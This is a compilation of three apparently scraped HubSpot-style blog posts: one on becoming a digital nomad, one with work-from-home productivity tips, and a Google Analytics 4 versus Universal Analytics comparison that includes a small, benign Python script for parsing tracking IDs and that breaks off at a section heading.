What Is a Digital Nomad and How Do You Become One?

In the Cascade Mountains of Southern Oregon, there sits a volcano with no peak. But what takes the place of a billowing summit isn’t a barren crater — it’s an electric blue lake, surrounded by pine trees and the jagged remains of the volcano’s collapsed mouth, which crumbled during an eruption almost 8,000 years ago.

This place is called Crater Lake. It’s considered one of the most beautiful national parks in the United States. It’s also where Justin Champion, a Content Professor at HubSpot Academy, spent his work day last Thursday.

A striking landscape, like Crater Lake, is a normal office view for Justin and his wife, Ariele. After working in the national park, they headed north to Portland and spent a day at Mt. Hood. Then, they drove through Redwood National Park. And next week, they plan to work in Yosemite National Park.

Justin and his wife have been living, working, and traveling across America in a Ford F-250 with an Airstream trailer hitched to its back for the past two years. And their alternative lifestyle has helped them prioritize life experiences and close connections over material possessions. They’re modern-day nomads. Or what most people call digital nomads.

What is a Digital Nomad?

Digital nomads are remote workers who usually travel to different locations. They often work in coffee shops, co-working spaces, or public libraries, relying on devices with wireless internet capabilities like smartphones and mobile hotspots to do their work wherever they want.

With 34% of remote employees working 4-5 days a week out of the office, the digital nomad lifestyle could be an exciting possibility if you’ve caught the travel bug and want to break free from the shackles of 9-5 life. Below, we’ll cover the benefits, job opportunities, and realities of this alternative lifestyle.

Let’s find out if it’s the right fit for you.

Living the Dream? 5 Benefits of Being a Digital Nomad

1. You’ll be more productive.

There’s no time to waste when you travel to gorgeous places almost every day. Exploring your new surroundings will motivate you to get your work done as soon as possible. Adventure can be one of the best types of motivation.

2. You’ll have more breakthrough ideas.

Creativity happens when you mash seemingly unrelated concepts together to form a new idea. Neuroscientists call this synaptic play, and the more incongruent the concepts are, the more synapses fire in your brain. Working in a different place every day gives you a lot of diverse experiences that you can pull from to make these creative connections. And when your brain is chock full of these diverse inputs, your ideas are much more inventive.

3. You’ll become more adaptable.

Constantly traveling to new places pushes you out of your comfort zone. And to adapt to new environments every day, you need to be willing to engage with different people and cultures. This makes you more open to new experiences in the future.

Traveling also improves your brain’s reaction to change. When you travel, the stress of navigating a foreign place sprouts dendrites in your brain. These dangling extensions increase your brain’s capacity and attentiveness during new and challenging situations in the future.

In a nutshell, traveling strengthens your desire and ability to learn new skills.

4. You’ll have more time to do the things you love.

Even though work can be great, we still work to live, not the other way around. Finishing work faster gives you more time in your schedule to explore your surroundings, do the things you’re passionate about, and spend more time with loved ones.

5. You’ll make lifelong friendships.

Adventure and memorable experiences forge close connections between people. When you embark on your journey, you’ll meet other digital nomads and become friends with them. And if you travel with a friend or significant other, your relationship will be closer than ever before.

Common Jobs for Digital Nomads

Today, most companies embrace remote work. 43% of American employees spent time working remotely last year, and this number will only increase. But being a digital nomad and working a few days at home are two different animals. If you want to keep your day job while traveling, you need to prove to your manager that you can handle full-time remote work before you work on the road. Justin Champion decided to work remotely for six months before he even asked to travel.

If you’re looking for a job, sift through sites that only list remote jobs, like We Work Remotely or Remote.co, and ask prospective employers if the role lends itself to your nomadic lifestyle.

Freelancing is also a common role for digital nomads. Before you embark on your journey, though, you must be realistic with yourself. How will you be able to make a living? Answer the following questions to help you figure this out:

  • What am I good at?
  • What do I like to do?
  • Is there a need for my skill?
  • Can I do this job online?

Once you know how you’ll be able to make money, you can enter the gig economy by marketing and selling your services on your own, or finding work on a freelance service marketplace like Upwork or Fiverr.

Whether you choose to work for a company or yourself, becoming a digital nomad doesn’t mean pigeonholing yourself in a specific role. Your job just has to be fully digital. Listed below are some common roles that lend themselves well to a fully remote lifestyle:

  • Accounting
  • Customer Service
  • Design
  • Editing
  • Healthcare
  • IT
  • Marketing
  • Project Management
  • Quality Assurance (QA)
  • Recruiting & HR
  • Sales
  • Software Development
  • Teacher/Tutor
  • Transcription
  • Virtual Assistant
  • Writing

As you can see, there are many different industries and roles for digital nomads. Remote work is becoming commonplace, which is exciting and beneficial for the workforce. But that doesn’t mean anyone and everyone should be a digital nomad. It’s still a tough challenge. You need to be organized and disciplined, or you won’t be able to enjoy your travels, which is the point of the lifestyle, right? So how do you set yourself up for success?

How Do You Become a Digital Nomad? 5 Things to Consider Before You Get Started

1. Get rid of unnecessary expenses.

Paying for things that don’t greatly impact your life is never ideal. That’s why you need to get rid of all the expenses that you won’t need living as a digital nomad. Things like gym memberships, subscriptions, and debt are all expenses that’ll bog you down on the road. And if you’re a freelancer, they’ll be even more of a burden because you might experience some periods of inconsistent income. Getting rid of these expenses and paying off debt will allow you to fully focus on your work and travels.

2. Make sure you have income you can rely on for months in advance.

Whatever lifestyle you pursue, it’s always smart to have a safety net. You never know when an emergency will arise. This rings especially true when you’re a digital nomad because you’re mostly on your own. You can’t find solace in a warm, comfortable home or family, and if you’re a freelancer, you don’t have the luxury of a consistent paycheck. To widen your safety net, you should sell any unnecessary belongings, move the essentials into a storage unit, sell or rent your house, and save as much money as possible.

3. Get travel health insurance.

Traveling can give you some of the best experiences of your life, but it’s not always a blissful, perpetual highlight reel. It’s still real life. You’ll get sick, have emergencies and accidents, and need regular checkups. You also need immunizations to enter certain parts of the world. Your health should be your number one priority during your travels, so make sure you buy a solid health insurance plan that’s valid in all the places you visit.

4. Set yourself up for financial success.

Ample funds are the key to successful travel. American credit cards will usually charge you a foreign transaction fee when you use them abroad, so ask your bank for a card with no foreign transaction fee that works internationally. You should also sign up for a credit monitoring service that alerts you when a new account or credit inquiry appears in your name, which is often the first sign that someone is trying to steal your identity.

5. If you travel internationally, unlock your phone.

Each country has its own cell phone carriers, so if you want to bounce from country to country, call your current carrier and ask them to unlock your phone. An unlocked phone accepts a SIM card from each local carrier you use, so you can get service in any country you visit.

Once you square these things away, it’s time to start your new life on the road. But actually living life as a digital nomad is an entirely different ballgame than preparing to be one.

7 Tips for Living as a Digital Nomad

1. Make a budget.

As a digital nomad, your budget should be your bible. And if you follow it, you can live quite comfortably. To create a successful budget, calculate your living expenditures, the cost of traveling to each destination, staying there, the activities you’ll do there, the costs of working, and how it all affects your savings if you can’t earn a salary for a while.

2. Plan for the worst-case scenario.

When you live abroad, it’s crucial to have multiple backup plans in case of any emergencies. Nothing ever really works out the way it’s supposed to. Things happen. What if your truck breaks down? Or what if you get stuck in a foreign country with no backup plan? What’s your plan B and C? You need to set these processes in place to handle the inevitable bumps in the road.

3. Join a digital nomad community.

Digital Nomad communities like Couchsurfing and Nomadlist will help you learn the nuances of the digital nomad lifestyle, and reduce its steep learning curve. Fellow nomads will be happy to answer any pressing questions about your new lifestyle and any areas you plan to visit. They’ll also teach you how to work effectively on the road. And arguably the most beneficial perk of these communities is that you can connect with other traveling professionals, which can lead to new business opportunities, partnerships, and friendships.

4. Make sure you have cell reception or wifi.

If your employer lets you work remotely, show them and your team some respect by being available as much as possible online. Not having wifi or cell phone reception should never be an excuse for missing a meeting or failing to get an assignment done. The same goes for client work, if you’re a freelancer.

To make sure you’ll always have an internet connection, consider investing in a cell phone signal booster and a dedicated mobile hotspot (often called a MiFi device). Signal boosters pick up the faintest shred of cell reception and amplify it inside your vehicle. A dedicated hotspot has its own cellular radio and data plan, so you don’t have to drain your phone’s battery or rely on a spotty public wifi connection, and your work traffic stays off a network you don’t control.

5. Make sure you can communicate with locals.

Knowing the language of the country you’re going to or knowing that they speak your language is crucial for successful travel. Assuming that there has to be someone who will understand English is a dangerous move. But if you must go to a place where you don’t know the native language or they don’t speak yours, use Google Translate or another translation app to navigate your new environment.

6. Research your destinations.

If you’re not living in an RV, find affordable housing on AirBnB or Couchsurfing before you arrive at your destination. And make sure your lodging is near a hospital, emergency room, or clinic in case of an emergency. You should also research the area to find a safe neighborhood to stay in.

7. Draw cash from ATMs.

Airports are notorious for charging ridiculously high currency exchange fees. If you need cash, draw it from an ATM. Your bank will charge you a fee, but it’ll be much lower than the one at the currency exchange desk.

Before you set off …

If an adventurous lifestyle sounds appealing to you, then being a digital nomad can be one of the most rewarding yet challenging ways to live. But if you arm yourself with organization, discipline, and a thirst for learning, you could enjoy an exciting and fulfilling life on the road. Just ask Justin and Ariele Champion. They’re living the alternative American Dream. And they’ve never looked back.

Source :
https://blog.hubspot.com/marketing/digital-nomad

How to Work From Home: 24 Tips From People Who Do It Successfully

Working from home is awesome, right up until the cat throws up on your computer. And your neighbor, who you can only assume is building a time machine, starts firing up all sorts of power tools and noisy machinery across the street.

COVID-19 has caused remote work to become a necessity instead of a luxury for many professionals. But which environment allows us to be more productive: the home office or the office office?

In the office office, your colleagues often pose the greatest threat to keeping you from getting some real, heads-down work done. They drop by your desk, engage you in conversation, and invite you to lunch — or so I hear. The social benefits are nice to have, but they can become a challenge if you’re easily distracted.

However, at the home office, while family members can be a distraction, I find that it’s easy for you to become your own worst enemy. Because without coworkers around, you’re free to drop those pesky inhibitions. At the home office, no one’s watching. You don’t necessarily feel that same peer pressure or communal obligation to get stuff done. (Also, you don’t have to wear pants.)


Below, I’ve compiled many great work-at-home tips and tricks from some of my awesome coworkers.

How to Work From Home

  1. Communicate expectations with anyone who will be home with you.
  2. Take clear breaks.
  3. Interact with other humans.
  4. Prepare meals the night before.
  5. Pick a definitive finish time.
  6. Eat and sleep.
  7. Talk to your employer.
  8. Join a remote-friendly company.
  9. Start a career as a freelancer.
  10. Start a home business.

1. Communicate expectations with anyone who will be home with you.

Of course, you might be working from home but still have “company.” Make sure any roommates, family members, and dogs (well, maybe not dogs) respect your space during work hours. Just because you’re working from home doesn’t mean you’re home.

If you share space with another work-from-home adult, you may have to lay ground rules about meeting times, shared desks and chairs, and quiet times.

CEO Sam Mallikarjunan tells how he manages to get work done even when people are around.

“If anyone else is going to be at home when you’re working, they just have to be clear that when you’re in your ‘office’ (in my case, my signal to the family is having headphones on), you’re working — even if it looks like and feels like you’re hanging out at home.”

He continues, “It’s easy to get distracted by the many things that have to be done around the house during the day.”

2. Take clear breaks.

It can be so easy to get distracted as a telecommuter that you avoid breaks altogether. Don’t let the guilt of working in the building you sleep in prevent you from taking five minutes to relax.

However rather than just opening YouTube and watching some comfort clips, use your breaks to get away from your desk. Go for a walk, enjoy fresh air, or spend time with others who might also be in the house.

Take Ginny Mineo‘s advice. “Breaks, like making and eating lunch, can recharge you to do better work. Don’t assume you need to be working 100% of the time while you’re home to be more productive.”

3. Interact with other humans.

When your office starts working from home, you’ll likely miss the casual social interactions with colleagues you’re used to throughout the day. When working from home, you don’t have the small talk and other activities that make each day at the office unique.

So what can you do? Communicate.

Fight boredom and loneliness with frequent communication with other employees. Reach out to them through video chat via apps like Zoom and Slack, a hosted phone system, or however else your company communicates.

Remember: You’re working from home, not the moon. Interacting with other people during the day is allowed, even if they’re not your colleagues. It’s a good idea to see another face during the day when most of your workday is solitary. So, use your breaks to interact with others.

“Go outside and find a human to interact with — ordering your coffee, running an errand, whatever. It keeps you sane.”

– Corey Wainwright

4. Prepare meals the night before.

When you’re in your own home, it can be tempting to spend time preparing a nice breakfast and lunch for yourself, chopping and cooking included. Don’t use precious minutes making your food the day of work — cook it the night before.

Preparing food ahead of time ensures you can use your meal times to eat and that you aren’t performing non-work tasks that spend energy better used at your desk.

Digital marketing strategist Lindsay Kolowich adds, “Cooking at home is time you wouldn’t have spent meal prepping if you’d been in the office that day, and I find the minutes can add up in the end. To mitigate that, I try to cook and prep my meals the night before, just like I would for a day at the office.”

5. Pick a definitive finishing time.

You might be under the impression that working from home establishes more work-life balance, but be careful with that assumption.

Working from home can also feel like being at a casino — you can get so caught up in your activity, in a relaxing environment, that you lose complete track of time.

“If you work from home full-time (or regularly), it’s really easy to let your work life bleed into your personal life,” says Tyler Littwin.

He continues, “Maintaining a boundary is important for both halves of the equation.”

In lieu of coworkers, whose packing up and leaving the office reminds you to do the same, set an alarm at the end of the day to indicate your normal workday is coming to an end. You don’t have to stop at exactly that time, but knowing the workday is technically over can help you start the process of saving your work and calling it quits for the evening.

6. Eat and sleep.

What is the biggest perk to working from home? One of the biggest benefits for some people (me), is complete access to the kitchen.

As soon as I take a break, I automatically drift towards the kitchen for some snacks.

An unhealthy diet can affect productivity and drain energy. When I switched to a healthier diet, it made me function better and get the most from my routine.

So eat well when working from home.

It’s also vital that you keep to a proper sleep schedule. Save binge-watching your favorite shows for the weekend. With the right food to keep energy levels high and sound sleep to refresh your body and mind, you can make a success of working from home.

7. Talk to your employer.

If you like your current job and don’t want to change it, the obvious step is to find a way to pivot the position.

One of the tips for doing this is folding the possibility of going remote into your next promotion cycle. Talk to your boss often about your intention to pivot.

And, if you’re not sure your employer will agree to working completely remotely, talk about the option of working remotely one or two days a week. When you use the work from home tips we’ve provided above, and your boss sees how productive you are, they could allow you more days to work from home.

8. Join a remote-friendly company.

If your work can be done remotely, but your current boss or organization doesn’t allow you to work from home, you might need to get a new job.

When looking for a work-from-home job, you can use the same methods you used in finding your regular office job. This includes channels like job sites, local job ads, and social media platforms.

Job sites that list work from home ads include:

Some remote-friendly firms include:

Check out these firms to see whether you meet the requirements to start working remotely for them.

9. Start a career as a freelancer.

If your current job isn’t remote work-friendly, you can go remote by starting your own business as a freelancer or a consultant.

Depending on the nature of your current job, you may start your own freelance business while still being employed.

The benefit of starting your freelance business while still employed is that it reduces the financial strain experienced by any new business.

10. Start a home business.

Starting a home business is one way to enjoy remote work.

Unlike other fields, certifications and education are not usually prerequisites. Instead, researching, having a smart business plan, and choosing the right business is more essential to the success of your business.

You can find more work-from-home tips in the books listed in this best remote work books article.

Working From Home Tips

  1. Get started early.
  2. Pretend like you are going into the office.
  3. Structure your day like you would in the office.
  4. Choose a dedicated workspace.
  5. Don’t stay at home.
  6. Make it harder to use social media.
  7. Commit to doing more.
  8. Work when you’re at your most productive.
  9. Save calls for the afternoon.
  10. Focus on one distraction.
  11. Plan out what you’ll be working on ahead of time.
  12. Use technology to stay connected.
  13. Match your music to the task at hand.
  14. Use laundry as a work timer.

1. Get started early.

When working in an office, your morning commute can help you wake up and feel ready to work by the time you get to your desk. At home, however, the transition from your pillow to your computer can be much more jarring.

Believe it or not, one way to work from home productively is to dive into your to-do list as soon as you wake up. Simply getting a project started first thing in the morning can be the key to making progress on it gradually throughout the day. Otherwise, you’ll prolong breakfast and let the morning sluggishness wear away your motivation.

Lindsay Kolowich says, “When I work from home, I wake up, put on a pot of coffee, and start working immediately — much earlier than normal working hours. I only start making breakfast once I’ve hit a wall or need a break. I’m a morning person and find I can get a ton done in the early morning hours, so this works really well for me.”

2. Pretend like you are going into the office.

The mental association you make between work and an office can make you more productive, and there’s no reason that feeling should be lost when working remotely.

I know that you love working in your pajamas (I do, too), but the mere act of changing clothes to something more serious will give you a signal to get work done throughout the day.

When you dress up, you give your brain a reason for dressing up, and it can keep you pumped throughout your work hours.

So when working from home, do all the things you’d do to prepare for an office role: Set your alarm, make (or get) coffee, and wear nice clothes.

Browsers like Google Chrome even let you create separate profiles, each with its own bookmarks bar and its own set of signed-in accounts: for example, one profile for home and a separate profile for work.

Take to heart the words of HubSpot graphic designer, Anna Faber-Hammond, who says, “Get fully ready for the day and pretend you’re actually going to work. Otherwise, you might find yourself back in bed.”

3. Structure your day like you would in the office.

When working from home, you’re your own personal manager and can choose your working hours.

However, without things like an in-person meeting schedule to break up your day, you can easily lose focus or burn out.

To stay on schedule, segment what you’ll do and when for the day. If you have an online calendar, create personal events and reminders that tell you when to shift gears and start on new tasks. Google Calendar makes this easy.

Structuring your day as you would in the office also saves you from work creep. With this structure in place, working from home will not cause your work to invade your personal life.

“Are mornings for writing while you’re in the office? Use the same schedule at home. This structure will help keep you focused and productive.” – Ginny Mineo

4. Choose a dedicated workspace.

Just because you’re not working at an office doesn’t mean you can’t, well, have an office. Rather than cooping yourself up in your room or on the couch in the living room — spaces associated with leisure time — dedicate a specific room or surface in your home to working remotely.

No matter the space or location, have an area of the home to work and stay committed to throughout the day. And, after choosing your dedicated workspace, make the most of it by making it quiet.

CEO, Sam Mallikarjunan says, “Have a place you go specifically to work. It could be a certain table, chair, local coffee shop — some place that’s consistently your ‘workspace.’ It helps you get into the right frame of mind.”

5. Don’t stay at home.

Is your home office just not getting it done for you? Take your work-from-home life a step further and get out of the house. Coffee shops, libraries, public lounges, and similar Wi-Fi-enabled spaces can help you simulate the energy of an office so you can stay productive even when you don’t sit in an official workplace.

Content marketer Corey Wainwright comments, “I get out of my home to work and go to an establishment with actual tables, chairs, and people. It helps simulate the work environment and removes the distractions I typically have at home, like the urge to finally clean my room, do laundry, or watch TV.”

6. Make it harder to use social media.

Social media is designed to make it easy for us to open and browse quickly. As remote workers, though, this convenience can be the detriment of our productivity.

To counteract your social networks’ ease of use during work hours, remove them from your browser shortcuts and log out of every account on your phone or computer.

You might even consider working primarily in a private (or, if you’re using Chrome, an “Incognito”) browser window. A private window starts with no cookies or saved sessions, so you’re signed out of all your accounts and your searches don’t autocomplete to the sites you habitually visit. It doesn’t hide your browsing from your employer’s network or your ISP, and it won’t stop a determined procrastinator, but it does add enough friction to make impulsive social breaks less likely.

Also, many have found it helpful to shut off social media notifications during the hours they work from home.

Alec Biedrzycki, product marketer at AirTable, says, “I remove all social networks from my toolbar bookmarks… you can get sucked in without knowing it, so eliminating the gateway to those networks keeps me on track.”

7. Commit to doing more.

Projects always take longer than you initially think they will. For that reason, you’ll frequently get less done than you set out to do.

So, just as you’re encouraged to overestimate how many hours you’ll spend doing one thing, you should also overestimate how many things you’ll do during the day.

Even if you come up short of your goal, you’ll still come out of that day with a solid list of tasks filed under ‘complete.’

“On days I’m working from home, I tend to slightly overcommit on what I’ll deliver that day. So even if I get the urge to go do something else, I know I’ve already committed a certain amount of work to my team.”- Corey Wainwright

8. Work when you’re at your most productive.

Nobody sprints through their work from morning to evening — your motivation will naturally ebb and flow throughout the day. However, when you’re working from home, it’s all the more important to know when those ebbs and flows will take place and plan your schedule around it.

To capitalize on your most productive periods, save your more challenging tasks for when you know you’ll be in the right headspace for them. Use slower points of the day to knock out the easier logistical tasks on your plate.

Verily Magazine calls these tasks “small acts of success,” and they can help build your momentum for the heavier projects that are waiting for you later on.

Product designer, Brittany Leaning, says about her routine, “For me, the most productive times of the day are usually early in the morning or late at night. I recognize this and try to plan my day accordingly. Also, music that pumps me up doesn’t hurt.”

The responsibility is on you to know when you are most productive and build your work schedule around the periods of maximum productivity.

9. Save calls for the afternoon.

Sometimes, I’m so tired in the morning, that I don’t even want to hear my voice — let alone talk to others with it.

You shouldn’t have to give yourself too much time to become productive in the morning, but you can give yourself some extra time before working directly with others.

If you’re struggling to develop a reasonable work schedule for yourself as a telecommuter, start with the solitary tasks in the morning.

Save your phone calls, meetings, Google Hangouts meetings, video calls, and other collaborative work for when you’ve officially “woken up.”

Senior Marketing Director, James Gilbert, advises that you “Take advantage of morning hours to crank through meaty projects without distractions, and save any calls or virtual meetings for the afternoon.”

10. Focus on one distraction.

There’s an expression out there that says, “if you want something done, ask a busy person.”

The bizarre but true rule of productivity is that the busier you are, the more you’ll do.

It’s like Newton’s law of inertia: If you’re in motion, you’ll stay in motion. If you’re at rest, you’ll stay at rest. And busy people are in fast-enough motion that they have the momentum to complete anything that comes across their desk.

Unfortunately, it’s hard to find things to help you reach that level of busyness when you’re at home — your motivation can just swing so easily. HubSpot’s principal marketing manager, Pam Vaughan, suggests focusing on something that maintains your rhythm (in her case, it’s her daughter).

She says, “When I work from home, my 20-month-old daughter is home with me, too. It seems counterintuitive, but because I have to manage taking care of her and keeping her happy and entertained while still getting my work done, the pressure helps to keep me focused. When she’s napping or entertaining herself, I go into super-productive work mode.

The ‘distraction’ of my daughter (I mean that in the most loving way possible) means I can’t possibly succumb to some of the other common distractions of home.”

11. Plan out what you’ll be working on ahead of time.

Spending time figuring out what you’ll do today can take away from actually doing those things. And, you’ll have planned your task list so recently that you can be tempted to change your schedule on the fly.

It’s important to let your agenda change if you need it to, but it’s equally important to commit to a schedule that outlines every assignment before you begin.

Try solidifying your schedule the day before, making it feel more official when you wake up the next day to get started on it.

“Plan out your week in advance to optimize for the environments you’ll be in.”- Niti Shah

12. Use technology to stay connected.

Working from home might make you feel cut off from the larger operation happening in your company.

Instant messaging and videoconferencing tools like Slack and Zoom can make it easy to check in with other remote employees and remind you how your work contributes to the big picture.

It’s also vital to invest in the right technology. For instance, an underperforming router can take the steam right out of your enthusiasm to work, so it’s better to invest in a high-performance router.

CMO and former HubSpot employee, Meghan Keaney Anderson, remarks, “At HubSpot, we use Slack to keep conversations going remotely, Trello to keep us organized around priorities, and Google Hangouts plus Webex to make remote meetings more productive. Getting the right stack of support tools to fit your work style makes a big difference.”

13. Match your music to the task at hand.

During the week, music is the soundtrack to your career (cheesy, but admit it, it’s true). And at work, the best playlists are diverse playlists — you can listen to music that matches the energy of the project you’re working on to boost your productivity.

Video game soundtracks are excellent at doing this. In a video game, the lyric-free music is designed to help you focus; it only makes sense that it would help you focus on your work, too.

Want some other genres to spice up your routine and make you feel focused? Take them from startup marketer, Ginny Mineo, who offers her work music preferences below.

“When I’m powering through my inbox, I need some intense and catchy rap/R&B (like Nicki Minaj or Miley Cyrus) blasting through my headphones, but when I’m writing, Tom Petty is the trick. Finding what music motivates and focuses me for different tasks (and then sticking to those playlists for those tasks) has completely changed my WFH productivity.”

14. Use laundry as a work timer.

You might have heard that listening to just two or three songs in the shower can help you save water. And it’s true; hearing a few of your favorite songs start and end, one after another, can remind you how long you’ve been in the bathroom and shorten your wash time.

Why bring this up? Because the same general principle can help you stay on task when working from home. But instead of three songs off your music playlist, run your laundry instead.

Doing your laundry is a built-in timer for your home. So, use the time to start and finish something from your to-do list before changing the load.

Committing to one assignment during the wash cycle and another during the dry process can train you to work smarter on tasks that you might technically have all day to tinker with. And when you know there’s a timer, it makes it hard for distractions to derail your work.

People ops manager, Emma Brudner, notes, “I also usually do laundry when I work from home, and I set mini-deadlines for myself corresponding to when I have to go downstairs to switch loads. If I’m working on an article, I tell myself I’ll get to a certain point before the wash cycle ends. Then I set another goal for the dryer.”

Staying Productive While Working From Home

While you might miss the office, working full time from home can be good for you.

For one, you don’t have to worry about commuting every day and you can better care for your loved ones by being around more often.

The work from home tips that we have provided can help you make the most of your new routine. Try out a few and you might find that you’re just as productive working from home as you are in the office.


Source :
https://blog.hubspot.com/marketing/productivity-tips-working-from-home

Google Analytics 4 vs Universal Analytics: Full Comparison 2022

Do you want to know what’s new in Google Analytics 4? How is GA4 different from Universal Analytics?

There’s a lot that’s changed in the new Google Analytics 4 platform including the navigation. Google has added new features and removed a number of reports you’re familiar with. And that means we’ll need to relearn the platform.

In this guide, we’ll detail the differences between Google Analytics 4 (GA4) vs. Universal Analytics (UA) so that you’re prepared to make the switch.

If you haven’t already switched to Google Analytics 4, we have an easy step-by-step guide you can follow: How to Set Up Google Analytics 4 in WordPress.

What’s New Only in Google Analytics 4?

In this section, we’re detailing the things that are new in GA4 that aren’t present in Universal Analytics at all. A little later, we’ll go into depth about all the changes you need to know about.

  1. Creating and Editing Events: GA4 brings about a revolutionary change in the way you track events. You can create a custom event and modify events right inside your GA4 property. This isn’t possible with Universal Analytics unless you write code to create a custom event.
  2. Conversion Events: Conversion goals are being replaced with conversion events. You can simply mark or unmark an event to start tracking it as a conversion. There’s an easy toggle switch to do this. GA4 even lets you create conversion events ahead of time before the event takes place.
  3. Data Streams: UA lets you connect your website’s URL to a view. These views let you filter data. So for instance, you can create a filter in a UA view to exclude certain IP addresses from reports. GA4 uses data streams instead of views.
  4. Data filters: Now you can add data filters to include or exclude internal and developer traffic from your GA4 reports.
  5. Google Analytics Intelligence: You can delete search queries from your search history to fine-tune your recommendations.
  6. Explorations and Templates: There’s a new Explore item in the menu that takes you to the Explorations page and Template gallery. Explorations give you a deeper understanding of your data. And there are report templates that you can use.
  7. Debug View: There’s a built-in visual debugging tool which is awesome news for developers and business owners. With this mode, you can get a real-time view of events displayed on a vertical timeline graph. You can see events for the past 30 minutes as well as the past 60 seconds.
  8. BigQuery linking: You can now link your GA4 account with your BigQuery account. This will let you run business intelligence tasks on your analytics property using BigQuery tools.

While this is what’s unique to GA4, there are a lot more changes than this. But first, let’s take a look at what’s gone from the Universal Analytics platform that we’re all familiar with.

What’s Missing in Google Analytics 4?

Google Analytics 4 has done away with some of the old concepts. These include:

  1. Views and Filters: As we mentioned, GA4 now uses Data Streams, which we explain in depth a bit later. So you won’t be able to create a view and related filters. Once you convert your UA property to GA4, you’ll be able to access a read-only list of UA filters under Admin > Account > All Filters.
  2. Customization (menu): UA properties have a customization menu for options to create dashboards, create custom reports, save existing reports, and create custom alerts. Below are the UA customization options, along with their GA4 equivalent.
    • Dashboards: At the time of writing this, there isn’t a way to create a custom GA4 dashboard.
    • Custom reports: GA4 has the Explorations page instead where you can create custom reports.
    • Saved reports: When you create a report in Explorations, it is automatically saved for you.
    • Custom alerts: Inside custom Insights, which is a new feature in GA4, you can set custom alerts.
  3. Google Search Console linking: There isn’t a way to link Google Search Console with a GA4 property at the time of writing.
  4. Bounce rate: One of the most tracked metrics – the bounce rate – is gone. It’s likely that this has been replaced with Engagement Metrics.
  5. Conversion Goals: In UA, you could create conversion goals under Views. But since views are gone, so are conversion goals. However, you can create conversion events to essentially track the same thing.

Now that you know what’s new and what’s missing in GA4, we’ll take you through an in-depth tour of the new GA4 platform.

Google Analytics 4 vs Universal Analytics

Below, we’ll be covering the main differences between GA4 and UA, section by section, so you can skip ahead to the one that interests you the most.

New Mobile Analytics

A major difference between GA4 and UA is that the new GA4 platform will also support mobile app analytics.

In fact, it was originally called “Mobile + Web”.

UA only tracked web analytics so it was difficult for businesses with apps to get an accurate outlook on their performance and digital marketing efforts.

Now with the GA4 data model, you’ll be able to track both your website and your app. You can set up a data stream for Android and iOS.

GA4 data streams

There’s also added functionality to create custom campaigns to collect information about which mediums/referrals are sending you the most traffic. This will show you where your campaigns get the most traction so that you can optimize your strategies in the future.

Easy User ID Tracking

Turning on user ID tracking in UA was quite a task. But that’s all been simplified in GA4 with the new measurement model. You simply need to navigate to Admin » Property Settings » Reporting Identity tab.

reporting identity in GA4

You can choose between Blended and Observed mode. Select the one you want and save your changes. That’s it.

In GA4, the reporting interface remains familiar and the navigation menu is still on the left. Even so, quite a few menu items have changed.

First, there are only 4 high-level menu items right now. Google may add more as the platform is further developed.

GA4 main menu

Next, each menu item has a collapsed view. You can expand each item by clicking on it.

Clicking a submenu item expands it further to reveal more submenus.

Submenu in ga4

In GA4, you’ll see familiar menu items you use for SEO and other purposes but in different locations. Here are the notable changes:

  • Realtime is under Reports
  • Audience(s) is under Configure
  • Acquisition is under Reports » Life cycle
  • Conversions is under Configure

GA4 also comes with completely new menu items as listed below:

  • Reports snapshot
  • Engagement
  • Monetization
  • Retention
  • Library
  • Custom definitions
  • DebugView

Measurement ID vs Tracking ID

Universal Analytics uses a Tracking ID that has a capital UA, a hyphen, a 7-digit tracking code followed by another hyphen, and a number. Like this: UA-1234567-1.

The last number is a sequential number starting from 1 that maps to a specific property in your Google Analytics account. So if you set up a second Google Analytics property, the new code will change to UA-1234567-2.

You can find the Tracking ID for a Universal Analytics property under Admin » Property column. Navigate to Property Settings » Tracking ID tab where you can see your UA tracking ID.

In GA4, you’ll see a Measurement ID instead of a Tracking ID. This starts with a capital G, followed by a hyphen and a 10-character code.

GA4 stream measurement id

It would look like this: G-SV0GT32HNZ.

To find your GA4 Measurement ID, go to Admin » Property » Data Streams. Click on a data stream. You’ll see your Measurement ID in the stream details after the Stream URL and Stream Name.
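As an added example that is not part of the original guide, here is a small Python inventory script that applies the two ID formats described above. It assumes exactly the shapes the guide gives (a 7-digit UA account number and a 10-character GA4 code); the sample page with its gtag snippet is constructed, and the IDs in it are the guide's own examples. During a dual-tracking period it lists every property a page actually reports to, so a measurement ID you do not own stands out.

```python
import re
from typing import Dict, Iterable, List

# Patterns follow the formats described in the guide. Assumption: UA account
# numbers are exactly 7 digits (as stated above) and GA4 codes are 10
# upper-case letters or digits. Widen the digit count if you have legacy UA
# properties whose account number is a different length.
UA_TRACKING_ID = re.compile(r"\bUA-(\d{7})-(\d+)\b")
GA4_MEASUREMENT_ID = re.compile(r"\bG-([A-Z0-9]{10})\b")

# Constructed sample page: a GA4 tag loaded via the global site tag, plus a
# legacy UA property still configured in dual-tracking mode.
SAMPLE_PAGE = """
<script async src="https://www.googletagmanager.com/gtag/js?id=G-SV0GT32HNZ"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'G-SV0GT32HNZ');
  gtag('config', 'UA-1234567-2');
</script>
"""


def classify_id(analytics_id: str) -> Dict[str, str]:
    """Return the platform and parsed parts of one ID; raise ValueError otherwise."""
    m = UA_TRACKING_ID.fullmatch(analytics_id)
    if m:
        # UA-<account>-<property index>: the trailing number counts up from 1
        # for each property created under the same account.
        return {"platform": "UA", "account": m.group(1), "property_index": m.group(2)}
    m = GA4_MEASUREMENT_ID.fullmatch(analytics_id)
    if m:
        return {"platform": "GA4", "stream_code": m.group(1)}
    raise ValueError(f"not a recognised Google Analytics ID: {analytics_id!r}")


def find_analytics_ids(html: str) -> List[Dict[str, str]]:
    """Extract every distinct UA tracking ID and GA4 measurement ID in a page."""
    found: List[Dict[str, str]] = []
    seen = set()
    for pattern in (UA_TRACKING_ID, GA4_MEASUREMENT_ID):
        for m in pattern.finditer(html):
            raw = m.group(0)
            if raw in seen:
                continue  # the same ID appears in both the script URL and gtag('config')
            seen.add(raw)
            entry = classify_id(raw)
            entry["id"] = raw
            found.append(entry)
    return found


def unexpected_ids(html: str, allowed: Iterable[str]) -> List[str]:
    """IDs embedded in the page that are not in the allow-list of properties you own."""
    allowed_set = set(allowed)
    return [e["id"] for e in find_analytics_ids(html) if e["id"] not in allowed_set]


if __name__ == "__main__":
    for entry in find_analytics_ids(SAMPLE_PAGE):
        print(entry)
    # Anything not on the allow-list is a property someone else controls.
    print("unexpected:", unexpected_ids(SAMPLE_PAGE, ["G-SV0GT32HNZ"]))
```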

Data Streams vs Views

